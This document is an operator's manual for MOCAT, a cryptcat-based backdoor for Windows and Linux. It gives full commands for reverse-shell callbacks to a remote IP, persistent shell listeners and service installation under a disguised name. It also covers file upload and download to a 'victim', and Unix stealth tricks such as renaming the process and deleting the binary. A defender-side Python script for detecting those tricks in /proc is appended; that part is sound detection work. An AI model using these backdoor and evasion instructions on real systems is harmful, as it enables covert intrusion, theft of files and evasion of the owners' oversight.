MOCAT
MOCAT is a cross-platform multi-purpose backdoor. It is based on cryptcat (netcat with Twofish encryption bolted on) plus some modifications by shadowlair, to which we have added a few additional features.
MOCAT works in client/server mode and ships as 2 executables, 1 for Windows and 1 for Linux. In addition to the standard netcat/cryptcat functionality, mocat has several features of its own. To work across platforms, mocat implements a custom transport using a combination of tinyXML and a custom MoXML library. All communications are encrypted with the Twofish algorithm under the shared key given with -k; that key is the only thing that keeps a third party from talking to a listening instance or reading a callback session, so choose it accordingly.
MOCAT Unix Mode
- The concept of installation as a service does not apply to Unix the way it does to Windows. Unix programs are started in many different ways (cron job, rc script, etc.), so mocat has no built-in method to install itself as a persistent service. On the other hand, most Unix boxes are stable enough that they rarely reboot on their own. The Unix version, if run in Listen mode (-L), respawns its listener and continues to accept connections on the specified port until reboot. If persistence across reboots is desired, a cron job, an rc script, or a modification of an existing rc script can be used.
MOCAT Specific Features:
- Command Interpreter - In addition to the standard cmd.exe (or Unix shell) session, mocat has a command interpreter that lets the user control the custom aspects of the tool. It is invoked from the remote command shell by issuing the *69 command.
- upload/download - Uploading and downloading of files through the mocat command shell with the put (upload) and get (download) commands.
- persistence - The Windows version can install itself as a permanent service so that the tool survives reboots. Installation is invoked with the -install command; removal with the -remove command.
- Currently mocat installs under the Windows service name "RPC"; the name is modifiable in the source code.
- When set to reverse callback mode, the user can set and modify the callback interval. Callback time is expressed in minutes and is set at install time with -c # (where # is the number of minutes between connection attempts). The default callback interval is 5 minutes.
- Changeable Settings: all "installed" settings (port, IP, callback) can be changed via the mocat interpreter.
- Registry: currently, mocat writes its settings in plaintext to the following registry keys:
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\IconValues
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\IconValues2 (callback time)
  Because the callback IP, port and interval are stored unencrypted under HKLM, which standard users can read by default, anyone on the box can recover the callback target, and these two values are a simple host-based indicator for the tool.
- process manipulation - MOCAT can list running processes on the host (pdump) as well as kill a process (kill) by PID.
- logging - MOCAT has a basic logging feature that allows output of a session to be captured on the local user's side of the connection in XML-formatted files. It is currently limited to output from the interpreter (*69) but can be built out later.
Mocat Command Interpreter Command Set
- These commands are invoked via the *69 command
| Command | Arguments | Description |
| put | "local path" "remote path" | upload a file to target |
| get | "remote path" "local path" | retrieve a file from target |
| pdump | | show target process list |
| kill | PID | kill a process |
| hangup | | quit interactive shell |
| callback | [time_minutes] [ip address] [port number] | configure callback properties; all three fields are required |
| log | | log commands locally |
| help | | show list of commands |
Command Line Usage
MOCAT uses standard netcat/cryptcat syntax with the exception of the "mocat unique" commands.
| Command | Arguments | Description |
| -d | | detach from console, background mode |
| -e | prog | inbound program to exec |
| -g | gateway | source-routing hop point[s], up to 8 |
| -G | num | source-routing pointer: 4, 8, 12 |
| -h | | help |
| -i | secs | delay interval for lines sent, ports scanned |
| -k | key | secret key to use for encryption |
| -l | | listen mode, for inbound connects |
| -L | | listen persistent, re-listen on socket close |
| -n | | numeric-only IP addresses, no DNS lookup |
| -o | file | hex dump of traffic |
| -p | port | local port number |
| -r | | randomize local and remote ports |
| -s | addr | local source address |
| -t | | answer TELNET negotiation |
| -u | | UDP mode |
| -v | | verbose [use twice to be more verbose] |
| -w | secs | timeout for connects and final net reads |
| -z | | zero-I/O mode [used for scanning] |
- port numbers can be individual or ranges: m-n [inclusive]
Service Installation Usage
MOCAT commands for installing/removing as a service
| Command | Arguments | Description |
| -install | | Installs mocat as a persistent service (Windows only) |
| -remove | | Removes the mocat persistent service |
| -c | # | callback time in minutes <default is 5> |
Operational Usage
Persistent Installation Callback Mode - Windows:
- In this configuration, mocat is installed for persistence, calls out to a remote IP address and provides a command shell. This is known as a "Reverse Shell Callback". You will need a local client listening at the remote IP address to receive this connection.
mocat.exe -install -c <#> -k <key> -e cmd.exe <remote IP> <remote port>
- The local user accepts the incoming call with:
mocat.exe -k <key> -l -p <port>
One-Time Use Callback Mode - Windows/Unix:
- In this configuration, mocat is run without persistence (one-time mode), calls out to a remote IP address and provides a command shell. Again, you will need a local client listening at the remote IP address to receive this connection. On Unix, invoke mocat instead of mocat.exe.
mocat.exe -k <key> -e cmd.exe <remote IP> <remote port>
Mocat Service Removal - Windows:
- To remove mocat as a permanent service, issue:
mocat.exe -remove
Persistent Listen Mode - Windows:
- In this configuration, mocat is installed as a service, listens and re-listens on a specified port and provides a cmd.exe shell to whoever connects. This configuration is useful if the victim has no firewall or if you know the firewall allows a specific port through to the victim. Keep in mind that the shared key is the only gate on that port: anyone who obtains the key gets the shell.
mocat.exe -install -k <key> -e cmd.exe -L -p <port>
- The local user connects to the above instance with:
mocat.exe -k <key> -n -v <IP address> <port>
Listen Mode - Unix:
- In this configuration, mocat listens on a specified port, re-spawns the listener on disconnect and provides a bash shell to whoever connects.
mocat -k <key> -e /bin/bash -L -p <port>
- The local user connects with the same command syntax given under Persistent Listen Mode - Windows.
Callback Mode - Unix:
- In this configuration, mocat calls back to a specified remote IP address/port and provides a bash shell.
mocat -k <key> -e /bin/bash <remote IP> <port>
- The local user accepts the incoming connection with:
mocat -k <key> -l -p <port>
MOCAT Unix Stealth
- When running from a Unix shell, anyone who pulls a process list will see something like the following, which is the telltale sign of netcat/cryptcat:
./mocat -k password -e /bin/bash -L -p 6666
- To get around this problem you can do a couple of different things.
- 1. Rename the file to something that looks legitimate, reset your PATH and pipe the options into the program on stdin (netcat, and therefore cryptcat and mocat, reads its command line from stdin when started with no arguments):
PATH=.
printf '%s\n' '-e /bin/bash -L -p 465' | someprocess &
This starts the program as "someprocess" and the only thing in a process list is someprocess, with no command options. Note that bash's builtin echo treats a leading -e as one of its own switches and strips it, so the echo -e ... form silently drops the -e flag; printf passes the line through unchanged. Add -k <key> to the piped line the same way if you do not want the built-in default key.
- 2. If you are not worried about persistence, delete your mocat file. The process is already in memory and will continue to run until a reboot or until someone kills it. (On Linux this leaves a trace of its own: /proc/<pid>/exe for the process then points to a path marked "(deleted)".)
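The flip side of the two tricks above is how a defender spots them. The following is an added example written for this page, not part of mocat or cryptcat: it walks a /proc tree and flags the telltale netcat-style command line, a process whose binary has been unlinked from disk (trick 2), and the bare-argv[0] shape left by trick 1. The regexes and the system-directory list are assumptions about what an analyst would key on; proc_root is a parameter so that a constructed sample tree (built inline) can stand in for the real /proc.

```python
"""Added example: defender-side scan for the Unix stealth tricks above.
Not part of mocat.  Run as root on a live box so every /proc/<pid>/exe
link is readable; pass a different proc_root to scan a fake tree."""
import os
import re
import tempfile

# Assumed indicators (not rules from the page): "-e <shell>" hands a shell
# to the peer; "-L" together with "-p <port>" is the persistent-listen form.
SHELL_EXEC = re.compile(r"(?:^|\s)-e\s+(?:/bin/(?:ba)?sh|cmd\.exe)(?:\s|$)")
LISTEN_FLAG = re.compile(r"(?:^|\s)-L(?:\s|$)")
PORT_FLAG = re.compile(r"(?:^|\s)-p\s+\d+(?:\s|$)")
# Assumed "normal" homes for a lone-argv[0] daemon's binary.
SYSTEM_DIRS = ("/usr/", "/bin/", "/sbin/", "/lib", "/opt/")


def read_cmdline(proc_dir):
    """argv of a process from <proc_dir>/cmdline (NUL-separated)."""
    try:
        with open(os.path.join(proc_dir, "cmdline"), "rb") as f:
            raw = f.read()
    except OSError:
        return []
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def read_exe(proc_dir):
    """Target of the <proc_dir>/exe symlink; None for kernel threads or EPERM."""
    try:
        return os.readlink(os.path.join(proc_dir, "exe"))
    except OSError:
        return None


def inspect_process(pid, proc_dir):
    """Return a list of (pid, reason, detail) findings for one process."""
    findings = []
    argv = read_cmdline(proc_dir)
    exe = read_exe(proc_dir)
    cmd = " ".join(argv)
    # The telltale netcat/cryptcat command line quoted on the page.
    if SHELL_EXEC.search(cmd) or (LISTEN_FLAG.search(cmd) and PORT_FLAG.search(cmd)):
        findings.append((pid, "netcat-style args", cmd))
    # Trick 2: the binary was unlinked while running; the kernel marks the link.
    if exe is not None and exe.endswith(" (deleted)"):
        findings.append((pid, "exe deleted from disk", exe))
    # Trick 1 leaves a bare argv[0] and no options.  A lone relative argv[0]
    # whose binary lives outside the system dirs is worth a look; this is
    # the noisiest of the three checks and is only a lead.
    if len(argv) == 1 and not argv[0].startswith("/") and exe \
            and not exe.startswith(SYSTEM_DIRS):
        findings.append((pid, "bare argv[0], exe outside system dirs", exe))
    return findings


def scan_proc(proc_root="/proc"):
    """Scan every numeric directory under proc_root and return all findings."""
    results = []
    for name in sorted((n for n in os.listdir(proc_root) if n.isdigit()), key=int):
        results.extend(inspect_process(int(name), os.path.join(proc_root, name)))
    return results


def build_sample_tree():
    """Constructed fake /proc (sample data, not captured from a real host):
    the page's example listener, a renamed-then-deleted copy, and a benign sshd."""
    root = tempfile.mkdtemp(prefix="fakeproc")
    samples = {
        100: (["./mocat", "-k", "password", "-e", "/bin/bash", "-L", "-p", "6666"], "/tmp/mocat"),
        200: (["someprocess"], "/tmp/someprocess (deleted)"),
        300: (["/usr/sbin/sshd", "-D"], "/usr/sbin/sshd"),
    }
    for pid, (argv, exe) in samples.items():
        d = os.path.join(root, str(pid))
        os.makedirs(d)
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(b"\0".join(a.encode() for a in argv) + b"\0")
        os.symlink(exe, os.path.join(d, "exe"))  # dangling link; readlink still works
    return root


if __name__ == "__main__":
    for pid, reason, detail in scan_proc():  # the live host
        print(f"{pid}\t{reason}\t{detail}")
```

A "(deleted)" exe also shows up after a package upgrade replaces a running binary, and the bare-argv[0] check will fire on some legitimate daemons, so treat the output as leads to triage rather than verdicts. Pairing a hit with the listening sockets owned by that PID (ss -tlnp, or /proc/net/tcp) is the natural next step.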
Command Interpreter Usage
Mocat's unique features such as upload/download and process manipulation are covered here. All syntax assumes you are currently in a remote shell (bash, sh, cmd.exe, etc.) and that you have entered the mocat interpreter session (*69).
Enter MOCAT interpreter mode:
*69
Upload a file from your local box to the remote mocat target
- Note: upload/download paths must be in quotes
put "e:\your\local\directory\file.exe" "c:\victim\directory\file.exe"
Download a file from the remote mocat target to your local box
get "c:\remote\directory\file.exe" "c:\my\local\directory\file.exe"
- Unix syntax is the same; only the paths change.
- Here is an example of getting a file from a remote Linux target to a local Windows box:
get "/usr/local/etc/somefile" "c:\my\local\directory\somefile.txt"
Process Manipulation
- To list or kill processes via the mocat interpreter:
pdump
kill <PID>
Callback Manipulation
callback <time> <IP address> <port> (all fields are required)
Building MOCAT
Building Mocat Linux
1. cp mocat_linux.tar.gz [build dir] to copy the mocat Linux archive into the build directory.
2. tar -xzvf mocat_linux.tar.gz to extract the source files.
3. make all to build mocat.
4. ./mocat [command args] to execute mocat.
make clean cleans object files and executables in the build directory.
Building Mocat Windows
Built with Visual Studio 6.0 C++.
1. Build the mo_comms library first: open mo_comms.dsw and rebuild.
2. Copy mo_comms.lib to the mocat_win directory, open mocat_win.dsp and rebuild.